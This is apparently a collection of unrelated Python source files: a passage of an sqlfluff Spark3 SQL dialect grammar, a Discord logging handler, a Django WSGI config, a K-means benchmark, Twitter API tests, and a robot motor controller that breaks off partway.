# Add Spark Segments
EqualsSegment_a=StringParser(
"==", SymbolSegment, name="equals", type="comparison_operator"
),
EqualsSegment_b=StringParser(
"<=>", SymbolSegment, name="equals", type="comparison_operator"
),
FileKeywordSegment=StringParser(
"FILE", KeywordSegment, name="file", type="file_type"
),
JarKeywordSegment=StringParser("JAR", KeywordSegment, name="jar", type="file_type"),
WhlKeywordSegment=StringParser("WHL", KeywordSegment, name="whl", type="file_type"),
# Add relevant Hive Grammar
BracketedPropertyListGrammar=hive_dialect.get_grammar(
"BracketedPropertyListGrammar"
),
CommentGrammar=hive_dialect.get_grammar("CommentGrammar"),
FileFormatGrammar=hive_dialect.get_grammar("FileFormatGrammar"),
LocationGrammar=hive_dialect.get_grammar("LocationGrammar"),
PropertyGrammar=hive_dialect.get_grammar("PropertyGrammar"),
SerdePropertiesGrammar=hive_dialect.get_grammar("SerdePropertiesGrammar"),
StoredAsGrammar=hive_dialect.get_grammar("StoredAsGrammar"),
StoredByGrammar=hive_dialect.get_grammar("StoredByGrammar"),
StorageFormatGrammar=hive_dialect.get_grammar("StorageFormatGrammar"),
SingleOrDoubleQuotedLiteralGrammar=hive_dialect.get_grammar(
"SingleOrDoubleQuotedLiteralGrammar"
),
TerminatedByGrammar=hive_dialect.get_grammar("TerminatedByGrammar"),
# Add Spark Grammar
BucketSpecGrammar=Sequence(
Ref("ClusterSpecGrammar"),
Ref("SortSpecGrammar", optional=True),
"INTO",
Ref("NumericLiteralSegment"),
"BUCKETS",
),
ClusterSpecGrammar=Sequence(
"CLUSTERED",
"BY",
Ref("BracketedColumnReferenceListGrammar"),
),
DatabasePropertiesGrammar=Sequence(
"DBPROPERTIES", Ref("BracketedPropertyListGrammar")
),
DataSourceFormatGrammar=OneOf(
# Spark Core Data Sources
# https://spark.apache.org/docs/latest/sql-data-sources.html
"AVRO",
"CSV",
"JSON",
"PARQUET",
"ORC",
"JDBC",
# Community Contributed Data Sources
"DELTA", # https://github.com/delta-io/delta
"XML", # https://github.com/databricks/spark-xml
),
PartitionSpecGrammar=Sequence(
OneOf("PARTITION", Sequence("PARTITIONED", "BY")),
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("EqualsSegment", optional=True),
Ref("LiteralGrammar", optional=True),
Ref("CommentGrammar", optional=True),
),
),
),
),
ResourceFileGrammar=OneOf(
Ref("JarKeywordSegment"),
Ref("WhlKeywordSegment"),
Ref("FileKeywordSegment"),
),
ResourceLocationGrammar=Sequence(
"USING",
Ref("ResourceFileGrammar"),
Ref("SingleOrDoubleQuotedLiteralGrammar"),
),
SortSpecGrammar=Sequence(
"SORTED",
"BY",
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
OneOf("ASC", "DESC", optional=True),
)
)
),
optional=True,
),
UnsetTablePropertiesGrammar=Sequence(
"UNSET",
"TBLPROPERTIES",
Ref("IfExistsGrammar", optional=True),
Bracketed(Delimited(Ref("SingleOrDoubleQuotedLiteralGrammar"))),
),
TablePropertiesGrammar=Sequence(
"TBLPROPERTIES", Ref("BracketedPropertyListGrammar")
),
)
# Hive Segments
@spark3_dialect.segment()
class RowFormatClauseSegment(hive_dialect.get_segment("RowFormatClauseSegment")): # type: ignore
"""`ROW FORMAT` clause in a CREATE HIVEFORMAT TABLE statement."""
type = "row_format_clause"
@spark3_dialect.segment()
class SkewedByClauseSegment(hive_dialect.get_segment("SkewedByClauseSegment")): # type: ignore
"""`SKEWED BY` clause in a CREATE HIVEFORMAT TABLE statement."""
type = "skewed_by_clause"
# Primitive Data Types
@spark3_dialect.segment()
class PrimitiveTypeSegment(BaseSegment):
"""Spark SQL Primitive data types.
https://spark.apache.org/docs/latest/sql-ref-datatypes.html
"""
type = "primitive_type"
match_grammar = OneOf(
"BOOLEAN",
# TODO : not currently supported; add segment - see NumericLiteralSegment
# "BYTE",
"TINYINT",
# TODO : not currently supported; add segment - see NumericLiteralSegment
# "SHORT",
"SMALLINT",
"INT",
"BIGINT",
"FLOAT",
"REAL",
"DOUBLE",
"DATE",
"TIMESTAMP",
"STRING",
Sequence(
OneOf("CHAR", "CHARACTER", "VARCHAR"),
Bracketed(Ref("NumericLiteralSegment"), optional=True),
),
"BINARY",
Sequence(
OneOf("DECIMAL", "DEC", "NUMERIC"),
Bracketed(
Ref("NumericLiteralSegment"),
Ref("CommaSegment"),
Ref("NumericLiteralSegment"),
optional=True,
),
),
"INTERVAL",
)
@spark3_dialect.segment(replace=True)
class DatatypeSegment(PrimitiveTypeSegment):
"""Spark SQL Data types.
https://spark.apache.org/docs/latest/sql-ref-datatypes.html
"""
type = "data_type"
match_grammar = OneOf(
Ref("PrimitiveTypeSegment"),
Sequence(
"ARRAY",
Bracketed(
Ref("DatatypeSegment"),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
Sequence(
"MAP",
Bracketed(
Sequence(
Ref("PrimitiveTypeSegment"),
Ref("CommaSegment"),
Ref("DatatypeSegment"),
),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
Sequence(
"STRUCT",
Bracketed(
Delimited(
Sequence(
Ref("NakedIdentifierSegment"),
Ref("ColonSegment"),
Ref("DatatypeSegment"),
Ref("CommentGrammar", optional=True),
),
),
bracket_pairs_set="angle_bracket_pairs",
bracket_type="angle",
),
),
)
# Data Definition Statements
# http://spark.apache.org/docs/latest/sql-ref-syntax-ddl.html
@spark3_dialect.segment()
class AlterDatabaseStatementSegment(BaseSegment):
"""An `ALTER DATABASE/SCHEMA` statement.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-database.html
"""
type = "alter_database_statement"
match_grammar = Sequence(
"ALTER",
OneOf("DATABASE", "SCHEMA"),
Ref("DatabaseReferenceSegment"),
"SET",
Ref("DatabasePropertiesGrammar"),
)
@spark3_dialect.segment(replace=True)
class AlterTableStatementSegment(BaseSegment):
"""A `ALTER TABLE` statement to change the table schema or properties.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-table.html
"""
type = "alter_table_statement"
match_grammar = Sequence(
"ALTER",
"TABLE",
Ref("TableReferenceSegment"),
OneOf(
# ALTER TABLE - RENAME TO `table_identifier`
Sequence(
"RENAME",
"TO",
Ref("TableReferenceSegment"),
),
# ALTER TABLE - RENAME `partition_spec`
Sequence(
Ref("PartitionSpecGrammar"),
"RENAME",
"TO",
Ref("PartitionSpecGrammar"),
),
# ALTER TABLE - ADD COLUMNS
Sequence(
"ADD",
"COLUMNS",
Bracketed(
Delimited(
Ref("ColumnDefinitionSegment"),
),
),
),
# ALTER TABLE - ALTER OR CHANGE COLUMN
Sequence(
OneOf("ALTER", "CHANGE"),
"COLUMN",
Ref("ColumnReferenceSegment"),
Sequence("TYPE", Ref("DatatypeSegment"), optional=True),
Ref("CommentGrammar", optional=True),
OneOf(
"FIRST",
Sequence("AFTER", Ref("ColumnReferenceSegment")),
optional=True,
),
Sequence(OneOf("SET", "DROP"), "NOT NULL", optional=True),
),
# ALTER TABLE - ADD PARTITION
Sequence(
"ADD",
Ref("IfNotExistsGrammar", optional=True),
AnyNumberOf(Ref("PartitionSpecGrammar")),
),
# ALTER TABLE - DROP PARTITION
Sequence(
"DROP",
Ref("IfExistsGrammar", optional=True),
Ref("PartitionSpecGrammar"),
Sequence("PURGE", optional=True),
),
# ALTER TABLE - REPAIR PARTITION
Sequence("RECOVER", "PARTITIONS"),
# ALTER TABLE - SET PROPERTIES
Sequence("SET", Ref("TablePropertiesGrammar")),
# ALTER TABLE - UNSET PROPERTIES
Ref("UnsetTablePropertiesGrammar"),
# ALTER TABLE - SET SERDE
Sequence(
Ref("PartitionSpecGrammar", optional=True),
"SET",
OneOf(
Sequence(
"SERDEPROPERTIES",
Ref("BracketedPropertyListGrammar"),
),
Sequence(
"SERDE",
Ref("SingleOrDoubleQuotedLiteralGrammar"),
Ref("SerdePropertiesGrammar", optional=True),
),
),
),
# ALTER TABLE - SET FILE FORMAT
Sequence(
Ref("PartitionSpecGrammar", optional=True),
"SET",
"FILEFORMAT",
Ref("DataSourceFormatGrammar"),
),
# ALTER TABLE - CHANGE FILE LOCATION
Sequence(
Ref("PartitionSpecGrammar"),
"SET",
Ref("LocationGrammar"),
),
),
)
@spark3_dialect.segment()
class AlterViewStatementSegment(BaseSegment):
"""A `ALTER VIEW` statement to change the view schema or properties.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-alter-view.html
"""
type = "alter_view_statement"
match_grammar = Sequence(
"ALTER",
"VIEW",
Ref("TableReferenceSegment"),
OneOf(
Sequence(
"RENAME",
"TO",
Ref("TableReferenceSegment"),
),
Sequence("SET", Ref("TablePropertiesGrammar")),
Ref("UnsetTablePropertiesGrammar"),
Sequence(
"AS",
OptionallyBracketed(Ref("SelectStatementSegment")),
),
),
)
@spark3_dialect.segment(replace=True)
class CreateDatabaseStatementSegment(BaseSegment):
"""A `CREATE DATABASE` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-database.html
"""
type = "create_database_statement"
match_grammar = Sequence(
"CREATE",
OneOf("DATABASE", "SCHEMA"),
Ref("IfNotExistsGrammar", optional=True),
Ref("DatabaseReferenceSegment"),
Ref("CommentGrammar", optional=True),
Ref("LocationGrammar", optional=True),
Sequence(
"WITH", "DBPROPERTIES", Ref("BracketedPropertyListGrammar"), optional=True
),
)
@spark3_dialect.segment(replace=True)
class CreateFunctionStatementSegment(BaseSegment):
"""A `CREATE FUNCTION` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-function.html
"""
type = "create_function_statement"
match_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Anything(),
)
parse_grammar = Sequence(
"CREATE",
Sequence("OR", "REPLACE", optional=True),
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Ref("IfNotExistsGrammar", optional=True),
Ref("FunctionNameIdentifierSegment"),
"AS",
Ref("SingleOrDoubleQuotedLiteralGrammar"),
Ref("ResourceLocationGrammar", optional=True),
)
@spark3_dialect.segment(replace=True)
class CreateTableStatementSegment(BaseSegment):
"""A `CREATE TABLE` statement using a Data Source or Like.
http://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-datasource.html
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-like.html
"""
type = "create_table_statement"
match_grammar = Sequence(
"CREATE",
"TABLE",
Ref("IfNotExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
OneOf(
# Columns and comment syntax:
Sequence(
Bracketed(
Delimited(
Sequence(
Ref("ColumnDefinitionSegment"),
Ref("CommentGrammar", optional=True),
),
),
),
),
# Like Syntax
Sequence(
"LIKE",
Ref("TableReferenceSegment"),
),
optional=True,
),
Sequence("USING", Ref("DataSourceFormatGrammar"), optional=True),
Ref("RowFormatClauseSegment", optional=True),
Ref("StoredAsGrammar", optional=True),
Sequence("OPTIONS", Ref("BracketedPropertyListGrammar"), optional=True),
Ref("PartitionSpecGrammar", optional=True),
Ref("BucketSpecGrammar", optional=True),
AnyNumberOf(
Ref("LocationGrammar", optional=True),
Ref("CommentGrammar", optional=True),
Ref("TablePropertiesGrammar", optional=True),
),
# Create AS syntax:
Sequence(
"AS",
OptionallyBracketed(Ref("SelectableGrammar")),
optional=True,
),
)
@spark3_dialect.segment()
class CreateHiveFormatTableStatementSegment(hive_dialect.get_segment("CreateTableStatementSegment")): # type: ignore
"""A `CREATE TABLE` statement using Hive format.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-hiveformat.html
"""
type = "create_table_statement"
@spark3_dialect.segment(replace=True)
class CreateViewStatementSegment(BaseSegment):
"""A `CREATE VIEW` statement.
https://spark.apache.org/docs/3.0.0/sql-ref-syntax-ddl-create-view.html#syntax
"""
type = "create_view_statement"
match_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref("TemporaryGrammar", optional=True),
"VIEW",
Ref("IfNotExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
# Columns and comment syntax:
Sequence(
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("CommentGrammar", optional=True),
),
),
),
optional=True,
),
Ref("CommentGrammar", optional=True),
Ref("TablePropertiesGrammar", optional=True),
"AS",
Ref("SelectableGrammar"),
Ref("WithNoSchemaBindingClauseSegment", optional=True),
)
@spark3_dialect.segment()
class DropFunctionStatementSegment(BaseSegment):
"""A `DROP FUNCTION` STATEMENT.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-drop-function.html
"""
type = "drop_function_statement"
match_grammar = Sequence(
"DROP",
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Ref("IfExistsGrammar", optional=True),
Ref("FunctionNameSegment"),
)
@spark3_dialect.segment()
class MsckRepairTableStatementSegment(hive_dialect.get_segment("MsckRepairTableStatementSegment")): # type: ignore
"""A `REPAIR TABLE` statement using Hive MSCK (Metastore Check) format.
This class inherits from Hive since Spark leverages Hive format for this command and
is dependent on the Hive metastore.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-repair-table.html
"""
type = "msck_repair_table_statement"
# Auxiliary Statements
@spark3_dialect.segment()
class AddExecutablePackage(BaseSegment):
"""A `ADD JAR` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-aux-resource-mgmt-add-jar.html
"""
type = "add_executable_package"
match_grammar = Sequence(
"ADD",
Ref("ResourceFileGrammar"),
Ref("SingleOrDoubleQuotedLiteralGrammar"),
)
@spark3_dialect.segment(replace=True)
class StatementSegment(BaseSegment):
"""Overriding StatementSegment to allow for additional segment parsing."""
match_grammar = ansi_dialect.get_segment("StatementSegment").match_grammar.copy()
parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy(
# Segments defined in Spark3 dialect
insert=[
# Data Definition Statements
Ref("AlterDatabaseStatementSegment"),
Ref("AlterTableStatementSegment"),
Ref("AlterViewStatementSegment"),
Ref("CreateHiveFormatTableStatementSegment"),
Ref("DropFunctionStatementSegment"),
Ref("MsckRepairTableStatementSegment"),
# Auxiliary Statements
Ref("AddExecutablePackage"),
],
remove=[
Ref("TransactionStatementSegment"),
Ref("CreateSchemaStatementSegment"),
Ref("SetSchemaStatementSegment"),
Ref("CreateExtensionStatementSegment"),
Ref("CreateModelStatementSegment"),
Ref("DropModelStatementSegment"),
],
)
@spark3_dialect.segment(replace=True)
class JoinClauseSegment(BaseSegment):
"""Any number of join clauses, including the `JOIN` keyword.
https://spark.apache.org/docs/3.0.0/sql-ref-syntax-qry-select-join.html
TODO: Add NATURAL JOIN syntax.
"""
type = "join_clause"
match_grammar = Sequence(
# NB These qualifiers are optional
# TODO: Allow nested joins like:
# ....FROM S1.T1 t1 LEFT JOIN ( S2.T2 t2 JOIN S3.T3 t3 ON t2.col1=t3.col1) ON tab1.col1 = tab2.col1
OneOf(
"CROSS",
"INNER",
Sequence(
OneOf(
"FULL",
"LEFT",
"RIGHT",
),
Ref.keyword("OUTER", optional=True),
),
Sequence(
Ref.keyword("LEFT", optional=True),
"SEMI",
),
Sequence(
Ref.keyword("LEFT", optional=True),
"ANTI",
),
optional=True,
),
Ref("JoinKeywords"),
Indent,
Sequence(
Ref("FromExpressionElementSegment"),
Conditional(Dedent, indented_using_on=False),
# NB: this is optional
OneOf(
# ON clause
Ref("JoinOnConditionSegment"),
# USING clause
Sequence(
"USING",
Indent,
Bracketed(
# NB: We don't use BracketedColumnReferenceListGrammar
# here because we're just using SingleIdentifierGrammar,
# rather than ObjectReferenceSegment or ColumnReferenceSegment.
# This is a) so that we don't lint it as a reference and
# b) because the column will probably be returned anyway
# during parsing.
Delimited(
Ref("SingleIdentifierGrammar"),
ephemeral_name="UsingClauseContents",
)
),
Dedent,
),
# Unqualified joins *are* allowed. They just might not
# be a good idea.
optional=True,
),
Conditional(Indent, indented_using_on=False),
),
Dedent,
)
get_eventual_alias = ansi_dialect.get_segment(
"JoinClauseSegment"
).get_eventual_alias
|
py | 1a3063674cfe6bb6c2581bacbbe4161e01ec982e | """A logging handler that emits to a Discord webhook."""
import requests
from logging import Handler
class DiscordHandler(Handler):
"""A logging handler that emits to a Discord webhook."""
def __init__(self, webhook, *args, **kwargs):
"""Initialize the DiscordHandler class."""
super().__init__(*args, **kwargs)
self.webhook = webhook
def emit(self, record):
"""Emit record to the Discord webhook."""
json = {"content": self.format(record)}
try:
requests.post(self.webhook, json=json)
except requests.RequestException:
self.handleError(record)
|
py | 1a306439e1e21796c88bf2b1c2a129203d4a3ca3 | """
WSGI config for pithyquotes project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pithyquotes.settings')
application = get_wsgi_application()
|
py | 1a3064c7f1f7f412193da4007d0f5810f165c1e5 | """ Class to initialize common objects. """
import pickle
from pathlib import Path
################################################################
class Init():
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, workdir, **kwargs):
print('Init class created.')
self.workdir = Path(workdir)
self.cachedir = self.workdir / 'cache'
print('workdir: {}'.format(self.workdir))
print('cachedir: {}'.format(self.cachedir))
#---------------------------------------------------------------
# Initialize settings as class members of obj
#---------------------------------------------------------------
def Initialize(self, obj):
obj.workdir = self.workdir
obj.cachedir = self.cachedir
obj.cachedir.mkdir(parents=True, exist_ok=True)
obj.AllData = pickle.load((obj.workdir / 'default.p').open('rb'))
#: Sets the collision systems for the entire project,
#: where each system is a string of the form
#: ``'<projectile 1><projectile 2><beam energy in GeV>'``,
#: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.
#: Even if the project uses only a single system,
#: this should still be a list of one system string.
obj.systems = obj.AllData["systems"]
#: Design attribute. This is a list of
#: strings describing the inputs.
#: The default is for the example data.
obj.keys = obj.AllData["keys"]
#: Design attribute. This is a list of input
#: labels in LaTeX for plotting.
#: The default is for the example data.
obj.labels = obj.AllData["labels"]
#: Design attribute. This is list of tuples of
#: (min,max) for each design input.
#: The default is for the example data.
obj.ranges = obj.AllData["ranges"]
#: Design array to use - should be a numpy array.
#: Keep at None generate a Latin Hypercube with above (specified) range.
#: Design array for example is commented under default.
obj.design_array = obj.AllData["design"]
#: Dictionary of the model output.
#: Form MUST be data_list[system][observable][subobservable][{'Y': ,'x': }].
#: 'Y' is an (n x p) numpy array of the output.
#:
#: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.
#: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.
obj.data_list = obj.AllData["model"]
#: Dictionary for the model validation output
#: Must be the same for as the model output dictionary
#data_list_val = pickle.load((cachedir / 'model/validation/data_dict_val.p').open('rb'))
obj.data_list_val = None
#: Dictionary of the experimental data.
#: Form MUST be exp_data_list[system][observable][subobservable][{'y':,'x':,'yerr':{'stat':,'sys'}}].
#: 'y' is a (1 x p) numpy array of experimental data.
#:
#: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.
#:
#: 'yerr' is a dictionary with keys 'stat' and 'sys'.
#:
#: 'stat' is a (1 x p) array of statistical errors.
#:
#: 'sys' is a (1 x p) array of systematic errors.
#: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.
obj.exp_data_list = obj.AllData["data"]
#: Experimental covariance matrix.
#: Set exp_cov = None to have the script estimate the covariance matrix.
#: Example commented below default.
obj.exp_cov = obj.AllData["cov"]
#: Observables to emulate as a list of 2-tuples
#: ``(obs, [list of subobs])``.
obj.observables = obj.AllData["observables"]
#---------------------------------------------------------------
# Initialize settings as class members of obj
#---------------------------------------------------------------
def systems(self):
AllData = pickle.load((self.workdir / 'default.p').open('rb'))
#: Sets the collision systems for the entire project,
#: where each system is a string of the form
#: ``'<projectile 1><projectile 2><beam energy in GeV>'``,
#: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.
#: Even if the project uses only a single system,
#: this should still be a list of one system string.
return AllData["systems"]
#---------------------------------------------------------------
# Return formatted string of class members
#---------------------------------------------------------------
def __str__(self):
s = []
variables = self.__dict__.keys()
for v in variables:
s.append('{} = {}'.format(v, self.__dict__[v]))
return "[i] {} with \n . {}".format(self.__class__.__name__, '\n . '.join(s))
|
py | 1a30660a357a742b4906447a5ec3c5d7baf05f8c | #===============================================================================
# Copyright 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
import sys
import os
import argparse
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import bench
import numpy as np
from cuml import KMeans
import warnings
from sklearn.metrics.cluster import davies_bouldin_score
warnings.filterwarnings('ignore', category=FutureWarning)
parser = argparse.ArgumentParser(description='cuML K-means benchmark')
parser.add_argument('-i', '--filei', '--fileI', '--init',
type=str, help='Initial clusters')
parser.add_argument('-t', '--tol', type=float, default=0.,
help='Absolute threshold')
parser.add_argument('--maxiter', type=int, default=100,
help='Maximum number of iterations')
parser.add_argument('--samples-per-batch', type=int, default=32768,
help='Maximum number of iterations')
parser.add_argument('--n-clusters', type=int, help='Number of clusters')
params = bench.parse_args(parser, prefix='cuml', loop_types=('fit', 'predict'))
# Load and convert generated data
X_train, X_test, _, _ = bench.load_data(params)
if params.filei == 'k-means++':
X_init = 'k-means++'
# Load initial centroids from specified path
elif params.filei is not None:
X_init = np.load(params.filei).astype(params.dtype)
params.n_clusters = X_init.shape[0]
# or choose random centroids from training data
else:
np.random.seed(params.seed)
centroids_idx = np.random.randint(0, X_train.shape[0],
size=params.n_clusters)
if hasattr(X_train, "iloc"):
X_init = X_train.iloc[centroids_idx].to_pandas().values
else:
X_init = X_train[centroids_idx]
# Workaround for cuML kmeans fail
# when second call of 'fit' method causes AttributeError
def kmeans_fit(X):
alg = KMeans(n_clusters=params.n_clusters, tol=params.tol,
max_iter=params.maxiter, init=X_init,
max_samples_per_batch=params.samples_per_batch)
alg.fit(X)
return alg
# Time fit
fit_time, kmeans = bench.measure_function_time(kmeans_fit, X_train, params=params)
train_predict = kmeans.predict(X_train)
# Time predict
predict_time, test_predict = bench.measure_function_time(kmeans.predict, X_test,
params=params)
X_train_host = bench.convert_to_numpy(X_train)
train_predict_host = bench.convert_to_numpy(train_predict)
acc_train = davies_bouldin_score(X_train_host, train_predict_host)
X_test_host = bench.convert_to_numpy(X_test)
test_predict_host = bench.convert_to_numpy(test_predict)
acc_test = davies_bouldin_score(X_test_host, test_predict_host)
bench.print_output(library='cuml', algorithm='kmeans',
stages=['training', 'prediction'], params=params,
functions=['KMeans.fit', 'KMeans.predict'],
times=[fit_time, predict_time], accuracy_type='davies_bouldin_score',
accuracies=[acc_train, acc_test], data=[X_train, X_test],
alg_instance=kmeans)
|
py | 1a306643f9ad0da5aa548ab1e69afefd9221d1cb |
from .telescope import Telescope
|
py | 1a30669c1014b48ab05ee7bc1ad54bd77277dc4b | from mcstats import mcstats
mcstats.registry.append(
mcstats.MinecraftStat(
'pot_flower',
{
'title': 'Florist',
'desc': 'Flowers potted',
'unit': 'int',
},
mcstats.StatReader(['minecraft:custom','minecraft:pot_flower'])
))
|
py | 1a3066fc013335596af9d8b9f78143f165a75b42 | import unittest
from social_apis.networks.twitter_v2 import Twitter2
from config import tw_access_token
class TestTwitter2(unittest.TestCase):
def setUp(self):
self.tweet_ids = ['1261326399320715264', '1278347468690915330']
self.api = Twitter2(access_token=tw_access_token)
def test_get_tweet(self):
self.api.get_tweet(id=self.tweet_ids[0])
def test_get_tweets(self):
self.api.get_tweets(ids=self.tweet_ids)
def test_get_compliance_jobs(self):
self.api.get_compliance_jobs(type='tweets')
def test_quota_parsing(self):
self.api.get_compliance_jobs(type='tweets')
self.assertIsNotNone(self.api.get_quota())
|
py | 1a3067196b0820719f7f46d6048545e8d5f4a48d | #! /usr/bin/env python
# Copyright (c) 2014, Dawn Robotics Ltd
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the Dawn Robotics Ltd nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import math
import time
import Queue
import mini_driver
import threading
#---------------------------------------------------------------------------------------------------
class RobotController:
MIN_ANGLE = 0.0
MAX_ANGLE = 180.0
CENTRE_ANGLE = (MIN_ANGLE + MAX_ANGLE)/2.0
MAX_UPDATE_TIME_DIFF = 0.25
TIME_BETWEEN_SERVO_SETTING_UPDATES = 1.0
TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES = 0.5
JOYSTICK_DEAD_ZONE = 0.1
MAX_ABS_NECK_SPEED = 30.0 # Degrees per second
MOTION_COMMAND_TIMEOUT = 2.0 # If no commands for the motors are recieved in this time then
# the motors (drive and servo) are set to zero speed
#-----------------------------------------------------------------------------------------------
def __init__( self, robotConfig ):
self.miniDriver = mini_driver.MiniDriver()
connected = self.miniDriver.connect()
if not connected:
raise Exception( "Unable to connect to the mini driver" )
self.robotConfig = robotConfig
self.leftMotorSpeed = 0
self.rightMotorSpeed = 0
self.panAngle = self.CENTRE_ANGLE
self.tiltAngle = self.CENTRE_ANGLE
self.panSpeed = 0.0
self.tiltSpeed = 0.0
self.lastServoSettingsSendTime = 0.0
self.lastSensorConfigurationSendTime = 0.0
self.lastUpdateTime = 0.0
self.lastMotionCommandTime = time.time()
self.piSensorModuleName = ""
self.piSensorModule = None
self.piSensorReader = None
self.piSensorDict = {}
#-----------------------------------------------------------------------------------------------
def __del__( self ):
self.disconnect()
#-----------------------------------------------------------------------------------------------
def disconnect( self ):
self.miniDriver.disconnect()
#-----------------------------------------------------------------------------------------------
def getStatusDict( self ):
presetMaxAbsMotorSpeed, presetMaxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
statusDict = {
"batteryVoltage" : self.miniDriver.getBatteryVoltageReading().data,
"presetMaxAbsMotorSpeed" : presetMaxAbsMotorSpeed,
"presetMaxAbsTurnSpeed" : presetMaxAbsTurnSpeed,
"sensors" : self.getSensorDict()
}
return statusDict
#-----------------------------------------------------------------------------------------------
def getSensorDict( self ):
sensorDict = {
"batteryVoltage" : self.miniDriver.getBatteryVoltageReading(),
"digital" : self.miniDriver.getDigitalReadings(),
"analog" : self.miniDriver.getAnalogReadings(),
"ultrasonic" : self.miniDriver.getUltrasonicReading(),
"encoders" : self.miniDriver.getEncodersReading(),
}
sensorDict.update( self.piSensorDict )
return sensorDict
#-----------------------------------------------------------------------------------------------
def normaliseJoystickData( self, joystickX, joystickY ):
stickVectorLength = math.sqrt( joystickX**2 + joystickY**2 )
if stickVectorLength > 1.0:
joystickX /= stickVectorLength
joystickY /= stickVectorLength
if stickVectorLength < self.JOYSTICK_DEAD_ZONE:
joystickX = 0.0
joystickY = 0.0
return ( joystickX, joystickY )
#-----------------------------------------------------------------------------------------------
def centreNeck( self ):
self.panAngle = self.CENTRE_ANGLE
self.tiltAngle = self.CENTRE_ANGLE
self.panSpeed = 0.0
self.tiltSpeed = 0.0
#-----------------------------------------------------------------------------------------------
def setMotorJoystickPos( self, joystickX, joystickY ):
joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )
if self.robotConfig.usePresetMotorSpeeds:
maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
else:
maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed
maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed
# Set forward speed from joystickY
leftMotorSpeed = maxAbsMotorSpeed*joystickY
rightMotorSpeed = maxAbsMotorSpeed*joystickY
# Set turn speed from joystickX
leftMotorSpeed += maxAbsTurnSpeed*joystickX
rightMotorSpeed -= maxAbsTurnSpeed*joystickX
leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )
rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )
self.leftMotorSpeed = leftMotorSpeed*self.robotConfig.leftMotorScale
self.rightMotorSpeed = rightMotorSpeed
self.lastMotionCommandTime = time.time()
